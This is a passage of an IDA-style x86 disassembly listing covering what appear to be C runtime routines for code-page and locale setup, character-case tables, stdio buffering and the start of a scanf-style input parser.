arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_41FE9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FEA9 proc near ; CODE XREF: sub_42026D+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_420042 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, ds:dword_4DCDA4
mov [ebp+arg_0], esi
jz loc_420036
xor ebx, ebx
cmp esi, ebx
jz loc_42002C
xor edx, edx
mov eax, offset dword_43CC00
loc_41FEDD: ; CODE XREF: sub_41FEA9+41�j
cmp [eax], esi
jz short loc_41FF53
add eax, 30h
inc edx
cmp eax, offset dword_43CCF0
jl short loc_41FEDD
lea eax, [ebp+var_18]
push eax
push esi
call dword_4271CC ; GetCPInfo
cmp eax, 1
jnz loc_420024
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4DCEC0
cmp [ebp+var_18], 1
mov ds:dword_4DCDA4, esi
rep stosd
stosb
mov ds:dword_4DCFC4, ebx
jbe loc_420012
cmp [ebp+var_12], 0
jz loc_41FFE8
lea ecx, [ebp+var_11]
loc_41FF30: ; CODE XREF: sub_41FEA9+139�j
mov dl, [ecx]
test dl, dl
jz loc_41FFE8
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_41FF41: ; CODE XREF: sub_41FEA9+A8�j
cmp eax, edx
ja loc_41FFDC
or ds:byte_4DCEC1[eax], 4
inc eax
jmp short loc_41FF41
; ---------------------------------------------------------------------------
loc_41FF53: ; CODE XREF: sub_41FEA9+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4DCEC0
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_43CC10[esi]
loc_41FF6F: ; CODE XREF: sub_41FEA9+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_41FFA2
loc_41FF76: ; CODE XREF: sub_41FEA9+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_41FFA2
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_41FF9B
mov edx, [ebp+var_4]
mov dl, byte_43CBF8[edx]
loc_41FF90: ; CODE XREF: sub_41FEA9+F0�j
or ds:byte_4DCEC1[eax], dl
inc eax
cmp eax, edi
jbe short loc_41FF90
loc_41FF9B: ; CODE XREF: sub_41FEA9+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_41FF76
loc_41FFA2: ; CODE XREF: sub_41FEA9+CB�j
; sub_41FEA9+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_41FF6F
mov eax, [ebp+arg_0]
mov ds:dword_4DCDBC, 1
push eax
mov ds:dword_4DCDA4, eax
call sub_42008C
lea esi, dword_43CC04[esi]
mov edi, offset dword_4DCDB0
movsd
movsd
pop ecx
mov ds:dword_4DCFC4, eax
movsd
jmp short loc_420031
; ---------------------------------------------------------------------------
loc_41FFDC: ; CODE XREF: sub_41FEA9+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_41FF30
loc_41FFE8: ; CODE XREF: sub_41FEA9+7E�j
; sub_41FEA9+8B�j
push 1
pop eax
loc_41FFEB: ; CODE XREF: sub_41FEA9+14F�j
or ds:byte_4DCEC1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_41FFEB
push esi
call sub_42008C
pop ecx
mov ds:dword_4DCFC4, eax
mov ds:dword_4DCDBC, 1
jmp short loc_420018
; ---------------------------------------------------------------------------
loc_420012: ; CODE XREF: sub_41FEA9+74�j
mov ds:dword_4DCDBC, ebx
loc_420018: ; CODE XREF: sub_41FEA9+167�j
xor eax, eax
mov edi, offset dword_4DCDB0
stosd
stosd
stosd
jmp short loc_420031
; ---------------------------------------------------------------------------
loc_420024: ; CODE XREF: sub_41FEA9+51�j
cmp ds:dword_4DB9E0, ebx
jz short loc_42003A
loc_42002C: ; CODE XREF: sub_41FEA9+27�j
call sub_4200BF
loc_420031: ; CODE XREF: sub_41FEA9+131�j
; sub_41FEA9+179�j
call sub_4200E8
loc_420036: ; CODE XREF: sub_41FEA9+1D�j
xor eax, eax
jmp short loc_42003D
; ---------------------------------------------------------------------------
loc_42003A: ; CODE XREF: sub_41FEA9+181�j
or eax, 0FFFFFFFFh
loc_42003D: ; CODE XREF: sub_41FEA9+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FEA9 endp
; =============== S U B R O U T I N E =======================================
sub_420042 proc near ; CODE XREF: sub_41FEA9+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and ds:dword_4DB9E0, 0
cmp eax, 0FFFFFFFEh
jnz short loc_420062
mov ds:dword_4DB9E0, 1
jmp dword_427060
; ---------------------------------------------------------------------------
loc_420062: ; CODE XREF: sub_420042+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_420077
mov ds:dword_4DB9E0, 1
jmp dword_4271D0
; ---------------------------------------------------------------------------
loc_420077: ; CODE XREF: sub_420042+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_42008B
mov eax, ds:dword_4DBA24
mov ds:dword_4DB9E0, 1
locret_42008B: ; CODE XREF: sub_420042+38�j
retn
sub_420042 endp
; =============== S U B R O U T I N E =======================================
sub_42008C proc near ; CODE XREF: sub_41FEA9+118�p
; sub_41FEA9+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_4200B9
sub eax, 4
jz short loc_4200B3
sub eax, 0Dh
jz short loc_4200AD
dec eax
jz short loc_4200A7
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4200A7: ; CODE XREF: sub_42008C+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_4200AD: ; CODE XREF: sub_42008C+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_4200B3: ; CODE XREF: sub_42008C+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_4200B9: ; CODE XREF: sub_42008C+9�j
mov eax, 411h
retn
sub_42008C endp
; =============== S U B R O U T I N E =======================================
sub_4200BF proc near ; CODE XREF: sub_41FEA9:loc_42002C�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_4DCEC0
rep stosd
stosb
xor eax, eax
mov edi, offset dword_4DCDB0
mov ds:dword_4DCDA4, eax
mov ds:dword_4DCDBC, eax
mov ds:dword_4DCFC4, eax
stosd
stosd
stosd
pop edi
retn
sub_4200BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4200E8 proc near ; CODE XREF: sub_41FEA9:loc_420031�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push ds:dword_4DCDA4
call dword_4271CC ; GetCPInfo
cmp eax, 1
jnz loc_420221
xor eax, eax
mov esi, 100h
loc_420112: ; CODE XREF: sub_4200E8+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_420112
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_420163
push ebx
push edi
lea edx, [ebp+var_D]
loc_420131: ; CODE XREF: sub_4200E8+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_420158
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_420158: ; CODE XREF: sub_4200E8+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_420131
pop edi
pop ebx
loc_420163: ; CODE XREF: sub_4200E8+42�j
push 0
lea eax, [ebp+var_514]
push ds:dword_4DCFC4
push ds:dword_4DCDA4
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_423CEC
push 0
lea eax, [ebp+var_214]
push ds:dword_4DCDA4
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push ds:dword_4DCFC4
call sub_422ACA
push 0
lea eax, [ebp+var_314]
push ds:dword_4DCDA4
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push ds:dword_4DCFC4
call sub_422ACA
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_4201DE: ; CODE XREF: sub_4200E8+135�j
mov dx, [ecx]
test dl, 1
jz short loc_4201FC
or ds:byte_4DCEC1[eax], 10h
mov dl, [ebp+eax+var_214]
loc_4201F4: ; CODE XREF: sub_4200E8+127�j
mov ds:byte_4DCDC0[eax], dl
jmp short loc_420218
; ---------------------------------------------------------------------------
loc_4201FC: ; CODE XREF: sub_4200E8+FC�j
test dl, 2
jz short loc_420211
or ds:byte_4DCEC1[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_4201F4
; ---------------------------------------------------------------------------
loc_420211: ; CODE XREF: sub_4200E8+117�j
and ds:byte_4DCDC0[eax], 0
loc_420218: ; CODE XREF: sub_4200E8+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_4201DE
jmp short loc_42026A
; ---------------------------------------------------------------------------
loc_420221: ; CODE XREF: sub_4200E8+1D�j
xor eax, eax
mov esi, 100h
loc_420228: ; CODE XREF: sub_4200E8+180�j
cmp eax, 41h
jb short loc_420246
cmp eax, 5Ah
ja short loc_420246
or ds:byte_4DCEC1[eax], 10h
mov cl, al
add cl, 20h
loc_42023E: ; CODE XREF: sub_4200E8+174�j
mov ds:byte_4DCDC0[eax], cl
jmp short loc_420265
; ---------------------------------------------------------------------------
loc_420246: ; CODE XREF: sub_4200E8+143�j
; sub_4200E8+148�j
cmp eax, 61h
jb short loc_42025E
cmp eax, 7Ah
ja short loc_42025E
or ds:byte_4DCEC1[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_42023E
; ---------------------------------------------------------------------------
loc_42025E: ; CODE XREF: sub_4200E8+161�j
; sub_4200E8+166�j
and ds:byte_4DCDC0[eax], 0
loc_420265: ; CODE XREF: sub_4200E8+15C�j
inc eax
cmp eax, esi
jb short loc_420228
loc_42026A: ; CODE XREF: sub_4200E8+137�j
pop esi
leave
retn
sub_4200E8 endp
; =============== S U B R O U T I N E =======================================
sub_42026D proc near ; CODE XREF: sub_422E72+9�p
; sub_422ECA+D�p ...
cmp ds:dword_4DCFF4, 0
jnz short locret_420288
push 0FFFFFFFDh
call sub_41FEA9
pop ecx
mov ds:dword_4DCFF4, 1
locret_420288: ; CODE XREF: sub_42026D+7�j
retn
sub_42026D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420289 proc near ; CODE XREF: sub_41B9D1+2B�p
; sub_41B9D1+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp ds:dword_4DCDBC, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_4202AD
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_41B5F0
add esp, 0Ch
jmp short loc_420310
; ---------------------------------------------------------------------------
loc_4202AD: ; CODE XREF: sub_420289+11�j
mov edx, [ebp+arg_8]
push esi
test edx, edx
jz short loc_4202F2
mov ecx, [ebp+arg_4]
loc_4202B8: ; CODE XREF: sub_420289+5B�j
mov al, [ecx]
dec edx
movzx esi, al
test ds:byte_4DCEC1[esi], 4
mov [edi], al
jz short loc_4202DC
inc edi
inc ecx
test edx, edx
jz short loc_4202E8
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_4202EE
jmp short loc_4202E2
; ---------------------------------------------------------------------------
loc_4202DC: ; CODE XREF: sub_420289+3E�j
inc edi
inc ecx
test al, al
jz short loc_4202F2
loc_4202E2: ; CODE XREF: sub_420289+51�j
test edx, edx
jnz short loc_4202B8
jmp short loc_4202F2
; ---------------------------------------------------------------------------
loc_4202E8: ; CODE XREF: sub_420289+44�j
and byte ptr [edi-1], 0
jmp short loc_4202F2
; ---------------------------------------------------------------------------
loc_4202EE: ; CODE XREF: sub_420289+4F�j
and byte ptr [edi-2], 0
loc_4202F2: ; CODE XREF: sub_420289+2A�j
; sub_420289+57�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_42030D
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_42030D: ; CODE XREF: sub_420289+6F�j
mov eax, [ebp+arg_0]
loc_420310: ; CODE XREF: sub_420289+22�j
pop edi
pop ebp
retn
sub_420289 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420313 proc near ; CODE XREF: sub_41BBBD+12B�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4DBA14, 0
push ebx
jnz short loc_42033E
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_4203DC
cmp eax, 7Ah
jg loc_4203DC
sub eax, 20h
jmp loc_4203DC
; ---------------------------------------------------------------------------
loc_42033E: ; CODE XREF: sub_420313+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_420371
cmp dword_43CBE4, 1
jle short loc_42035E
push 2
push ebx
call sub_41F515
pop ecx
pop ecx
jmp short loc_420369
; ---------------------------------------------------------------------------
loc_42035E: ; CODE XREF: sub_420313+3D�j
mov eax, off_43C9D8
mov al, [eax+ebx*2]
and eax, 2
loc_420369: ; CODE XREF: sub_420313+49�j
test eax, eax
jnz short loc_420371
loc_42036D: ; CODE XREF: sub_420313+AF�j
mov eax, ebx
jmp short loc_4203DC
; ---------------------------------------------------------------------------
loc_420371: ; CODE XREF: sub_420313+34�j
; sub_420313+58�j
mov edx, off_43C9D8
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_420394
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_42039D
; ---------------------------------------------------------------------------
loc_420394: ; CODE XREF: sub_420313+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_42039D: ; CODE XREF: sub_420313+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push ds:dword_4DBA14
call sub_422ACA
add esp, 20h
test eax, eax
jz short loc_42036D
cmp eax, 1
jnz short loc_4203CF
movzx eax, [ebp+var_4]
jmp short loc_4203DC
; ---------------------------------------------------------------------------
loc_4203CF: ; CODE XREF: sub_420313+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_4203DC: ; CODE XREF: sub_420313+14�j
; sub_420313+1D�j ...
pop ebx
leave
retn
sub_420313 endp
; =============== S U B R O U T I N E =======================================
sub_4203DF proc near ; CODE XREF: sub_41BDDC+1D�p
; sub_41D3BE+16�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov ds:dword_4DB95C, ecx
mov eax, offset dword_43CCF0
loc_4203F0: ; CODE XREF: sub_4203DF+1E�j
cmp ecx, [eax]
jz short loc_420414
add eax, 8
inc edx
cmp eax, offset dword_43CE58
jl short loc_4203F0
cmp ecx, 13h
jb short loc_420421
cmp ecx, 24h
ja short loc_420421
mov ds:dword_4DB958, 0Dh
retn
; ---------------------------------------------------------------------------
loc_420414: ; CODE XREF: sub_4203DF+13�j
mov eax, dword_43CCF4[edx*8]
mov ds:dword_4DB958, eax
retn
; ---------------------------------------------------------------------------
loc_420421: ; CODE XREF: sub_4203DF+23�j
; sub_4203DF+28�j
cmp ecx, 0BCh
jb short loc_42043B
cmp ecx, 0CAh
mov ds:dword_4DB958, 8
jbe short locret_420445
loc_42043B: ; CODE XREF: sub_4203DF+48�j
mov ds:dword_4DB958, 16h
locret_420445: ; CODE XREF: sub_4203DF+5A�j
retn
sub_4203DF endp
; =============== S U B R O U T I N E =======================================
sub_420446 proc near ; CODE XREF: sub_41BE06+8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+10h]
call sub_423E35
test eax, eax
pop ecx
jz short loc_4204CF
cmp esi, offset dword_43D0E8
jnz short loc_420464
xor eax, eax
jmp short loc_42046F
; ---------------------------------------------------------------------------
loc_420464: ; CODE XREF: sub_420446+18�j
cmp esi, offset dword_43D108
jnz short loc_4204CF
push 1
pop eax
loc_42046F: ; CODE XREF: sub_420446+1C�j
inc ds:dword_4DBB40
test word ptr [esi+0Ch], 10Ch
jnz short loc_4204CF
cmp ds:dword_4DB9E4[eax*4], 0
push ebx
push edi
lea edi, ds:4DB9E4h[eax*4]
mov ebx, 1000h
jnz short loc_4204B5
push ebx
call sub_41B4D5
test eax, eax
pop ecx
mov [edi], eax
jnz short loc_4204B5
lea eax, [esi+14h]
push 2
mov [esi+8], eax
mov [esi], eax
pop eax
mov [esi+18h], eax
mov [esi+4], eax
jmp short loc_4204C2
; ---------------------------------------------------------------------------
loc_4204B5: ; CODE XREF: sub_420446+4D�j
; sub_420446+5A�j
mov edi, [edi]
mov [esi+18h], ebx
mov [esi+8], edi
mov [esi], edi
mov [esi+4], ebx
loc_4204C2: ; CODE XREF: sub_420446+6D�j
or word ptr [esi+0Ch], 1102h
push 1
pop eax
pop edi
pop ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4204CF: ; CODE XREF: sub_420446+10�j
; sub_420446+24�j ...
xor eax, eax
pop esi
retn
sub_420446 endp
; =============== S U B R O U T I N E =======================================
sub_4204D3 proc near ; CODE XREF: sub_41BE06+24�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
jz short loc_4204FD
mov esi, [esp+4+arg_4]
test byte ptr [esi+0Dh], 10h
jz short loc_42050E
push esi
call sub_41DB8B
and byte ptr [esi+0Dh], 0EEh
and dword ptr [esi+18h], 0
and dword ptr [esi], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4204FD: ; CODE XREF: sub_4204D3+6�j
mov eax, [esp+4+arg_4]
test byte ptr [eax+0Dh], 10h
jz short loc_42050E
push eax
call sub_41DB8B
pop ecx
loc_42050E: ; CODE XREF: sub_4204D3+10�j
; sub_4204D3+32�j
pop esi
retn
sub_4204D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420510 proc near ; CODE XREF: sub_41C645+2A�p
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_64 = byte ptr -64h
var_59 = byte ptr -59h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_35 = byte ptr -35h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C4h
and [ebp+var_15], 0
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
push edi
mov al, [esi]
mov [ebp+var_4], ebx
test al, al
mov [ebp+var_34], ebx
jz loc_420F16
mov edi, [ebp+arg_0]
jmp short loc_42053F
; ---------------------------------------------------------------------------
loc_42053A: ; CODE XREF: sub_420510+9CE�j
mov edi, [ebp+arg_0]
xor ebx, ebx
loc_42053F: ; CODE XREF: sub_420510+28�j
cmp dword_43CBE4, 1
jle short loc_420557
movzx eax, al
push 8
push eax
call sub_41F515
pop ecx
pop ecx
jmp short loc_420566
; ---------------------------------------------------------------------------
loc_420557: ; CODE XREF: sub_420510+36�j
mov ecx, off_43C9D8
movzx eax, al
mov al, [ecx+eax*2]
and eax, 8
loc_420566: ; CODE XREF: sub_420510+45�j
cmp eax, ebx
jz short loc_4205A0
dec [ebp+var_4]
push edi
lea eax, [ebp+var_4]
push edi
push eax
call sub_420F9D
pop ecx
pop ecx
push eax
call sub_420F86
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41D670
add esp, 0Ch
loc_42058E: ; CODE XREF: sub_420510+8E�j
test eax, eax
jz short loc_4205A0
movzx eax, byte ptr [esi+1]
inc esi
push eax
call sub_41D670
pop ecx
jmp short loc_42058E
; ---------------------------------------------------------------------------
loc_4205A0: ; CODE XREF: sub_420510+58�j
; sub_420510+80�j
cmp byte ptr [esi], 25h
jnz loc_420E82
and [ebp+var_35], 0
and [ebp+var_18], 0
and [ebp+var_17], 0
and [ebp+var_E], 0
and [ebp+var_F], 0
and [ebp+var_16], 0
xor edi, edi
and [ebp+var_5], 0
mov [ebp+var_1C], ebx
mov [ebp+var_20], ebx
mov [ebp+var_C], ebx
mov [ebp+var_D], 1
mov [ebp+var_30], ebx
loc_4205D7: ; CODE XREF: sub_420510+172�j
movzx ebx, byte ptr [esi+1]
inc esi
cmp dword_43CBE4, 1
jle short loc_4205F4
movzx eax, bl
push 4
push eax
call sub_41F515
pop ecx
pop ecx
jmp short loc_420603
; ---------------------------------------------------------------------------
loc_4205F4: ; CODE XREF: sub_420510+D3�j
mov ecx, off_43C9D8
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_420603: ; CODE XREF: sub_420510+E2�j
test eax, eax
jz short loc_420619
mov eax, [ebp+var_C]
inc [ebp+var_20]
lea eax, [eax+eax*4]
lea eax, [ebx+eax*2-30h]
mov [ebp+var_C], eax
jmp short loc_42067E
; ---------------------------------------------------------------------------
loc_420619: ; CODE XREF: sub_420510+F5�j
cmp ebx, 4Eh
jg short loc_42065C
jz short loc_42067E
cmp ebx, 2Ah
jz short loc_420657
cmp ebx, 46h
jz short loc_42067E
cmp ebx, 49h
jz short loc_420639
cmp ebx, 4Ch
jnz short loc_42066B
inc [ebp+var_D]
jmp short loc_42067E
; ---------------------------------------------------------------------------
loc_420639: ; CODE XREF: sub_420510+11D�j
cmp byte ptr [esi+1], 36h
jnz short loc_42066B
cmp byte ptr [esi+2], 34h
lea eax, [esi+2]
jnz short loc_42066B
inc [ebp+var_30]
and [ebp+var_28], 0
and [ebp+var_24], 0
mov esi, eax
jmp short loc_42067E
; ---------------------------------------------------------------------------
loc_420657: ; CODE XREF: sub_420510+113�j
inc [ebp+var_E]
jmp short loc_42067E
; ---------------------------------------------------------------------------
loc_42065C: ; CODE XREF: sub_420510+10C�j
cmp ebx, 68h
jz short loc_420678
cmp ebx, 6Ch
jz short loc_420670
cmp ebx, 77h
jz short loc_420673
loc_42066B: ; CODE XREF: sub_420510+122�j
; sub_420510+12D�j ...
inc [ebp+var_F]
jmp short loc_42067E
; ---------------------------------------------------------------------------
loc_420670: ; CODE XREF: sub_420510+154�j
inc [ebp+var_D]
loc_420673: ; CODE XREF: sub_420510+159�j
inc [ebp+var_5]
jmp short loc_42067E
; ---------------------------------------------------------------------------
loc_420678: ; CODE XREF: sub_420510+14F�j
dec [ebp+var_D]
dec [ebp+var_5]
loc_42067E: ; CODE XREF: sub_420510+107�j
; sub_420510+10E�j ...
cmp [ebp+var_F], 0
jz loc_4205D7
cmp [ebp+var_E], 0
mov [ebp+arg_4], esi
jnz short loc_4206A3
mov eax, [ebp+arg_8]
mov [ebp+var_44], eax
add eax, 4
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_2C], eax
loc_4206A3: ; CODE XREF: sub_420510+17F�j
and [ebp+var_F], 0
cmp [ebp+var_5], 0
jnz short loc_4206C1
mov al, [esi]
cmp al, 53h
jz short loc_4206BD
cmp al, 43h
jz short loc_4206BD
or [ebp+var_5], 0FFh
jmp short loc_4206C1
; ---------------------------------------------------------------------------
loc_4206BD: ; CODE XREF: sub_420510+1A1�j
; sub_420510+1A5�j
mov [ebp+var_5], 1
loc_4206C1: ; CODE XREF: sub_420510+19B�j
; sub_420510+1AB�j
mov ebx, [ebp+arg_4]
movzx esi, byte ptr [ebx]
or esi, 20h
cmp esi, 6Eh
mov [ebp+var_3C], esi
jz short loc_4206FA
cmp esi, 63h
jz short loc_4206EB
cmp esi, 7Bh
jz short loc_4206EB
push [ebp+arg_0]
lea eax, [ebp+var_4]
push eax
call sub_420F9D
pop ecx
jmp short loc_4206F6
; ---------------------------------------------------------------------------
loc_4206EB: ; CODE XREF: sub_420510+1C5�j
; sub_420510+1CA�j
push [ebp+arg_0]
inc [ebp+var_4]
call sub_420F6C
loc_4206F6: ; CODE XREF: sub_420510+1D9�j
pop ecx
mov [ebp+var_14], eax
loc_4206FA: ; CODE XREF: sub_420510+1C0�j
xor eax, eax
cmp [ebp+var_20], eax
jz short loc_42070A
cmp [ebp+var_C], eax
jz loc_420EE6
loc_42070A: ; CODE XREF: sub_420510+1EF�j
cmp esi, 6Fh
jg loc_420971
jz loc_420C23
cmp esi, 63h
jz loc_42094E
cmp esi, 64h
jz loc_420C23
jle loc_42099B
cmp esi, 67h
jle short loc_42076E
cmp esi, 69h
jz short loc_420756
cmp esi, 6Eh
jnz loc_42099B
cmp [ebp+var_E], 0
mov edi, [ebp+var_4]
jz loc_420E51
jmp loc_420E77
; ---------------------------------------------------------------------------
loc_420756: ; CODE XREF: sub_420510+229�j
push 64h
pop esi
loc_420759: ; CODE XREF: sub_420510+480�j
mov ebx, [ebp+var_14]
cmp ebx, 2Dh
jnz loc_4209E3
mov [ebp+var_17], 1
jmp loc_4209E8
; ---------------------------------------------------------------------------
loc_42076E: ; CODE XREF: sub_420510+224�j
mov ebx, [ebp+var_14]
lea esi, [ebp+var_1C4]
cmp ebx, 2Dh
jnz short loc_42078A
mov [ebp+var_1C4], bl
lea esi, [ebp+var_1C3]
jmp short loc_42078F
; ---------------------------------------------------------------------------
loc_42078A: ; CODE XREF: sub_420510+26A�j
cmp ebx, 2Bh
jnz short loc_4207A6
loc_42078F: ; CODE XREF: sub_420510+278�j
mov edi, [ebp+arg_0]
dec [ebp+var_C]
inc [ebp+var_4]
push edi
call sub_420F6C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_4207A9
; ---------------------------------------------------------------------------
loc_4207A6: ; CODE XREF: sub_420510+27D�j
mov edi, [ebp+arg_0]
loc_4207A9: ; CODE XREF: sub_420510+294�j
cmp [ebp+var_20], 0
jz short loc_4207B8
cmp [ebp+var_C], 15Dh
jle short loc_4207BF
loc_4207B8: ; CODE XREF: sub_420510+29D�j
mov [ebp+var_C], 15Dh
loc_4207BF: ; CODE XREF: sub_420510+2A6�j
; sub_420510+2F2�j
cmp dword_43CBE4, 1
jle short loc_4207D4
push 4
push ebx
call sub_41F515
pop ecx
pop ecx
jmp short loc_4207DF
; ---------------------------------------------------------------------------
loc_4207D4: ; CODE XREF: sub_420510+2B6�j
mov eax, off_43C9D8
mov al, [eax+ebx*2]
and eax, 4
loc_4207DF: ; CODE XREF: sub_420510+2C2�j
test eax, eax
jz short loc_420804
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_420804
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_420F6C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_4207BF
; ---------------------------------------------------------------------------
loc_420804: ; CODE XREF: sub_420510+2D1�j
; sub_420510+2DB�j
cmp byte_43CBE8, bl
jnz short loc_420872
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_420872
inc [ebp+var_4]
push edi
call sub_420F6C
mov ebx, eax
mov al, byte_43CBE8
mov [esi], al
pop ecx
mov [ebp+var_14], ebx
inc esi
loc_42082D: ; CODE XREF: sub_420510+360�j
cmp dword_43CBE4, 1
jle short loc_420842
push 4
push ebx
call sub_41F515
pop ecx
pop ecx
jmp short loc_42084D
; ---------------------------------------------------------------------------
loc_420842: ; CODE XREF: sub_420510+324�j
mov eax, off_43C9D8
mov al, [eax+ebx*2]
and eax, 4
loc_42084D: ; CODE XREF: sub_420510+330�j
test eax, eax
jz short loc_420872
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_420872
inc [ebp+var_1C]
mov [esi], bl
inc esi
inc [ebp+var_4]
push edi
call sub_420F6C
mov ebx, eax
pop ecx
mov [ebp+var_14], ebx
jmp short loc_42082D
; ---------------------------------------------------------------------------
loc_420872: ; CODE XREF: sub_420510+2FA�j
; sub_420510+304�j ...
cmp [ebp+var_1C], 0
jz loc_42090A
cmp ebx, 65h
jz short loc_42088A
cmp ebx, 45h
jnz loc_42090A
loc_42088A: ; CODE XREF: sub_420510+36F�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jz short loc_42090A
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_4]
push edi
call sub_420F6C
mov ebx, eax
pop ecx
cmp ebx, 2Dh
mov [ebp+var_14], ebx
jnz short loc_4208B1
mov [esi], al
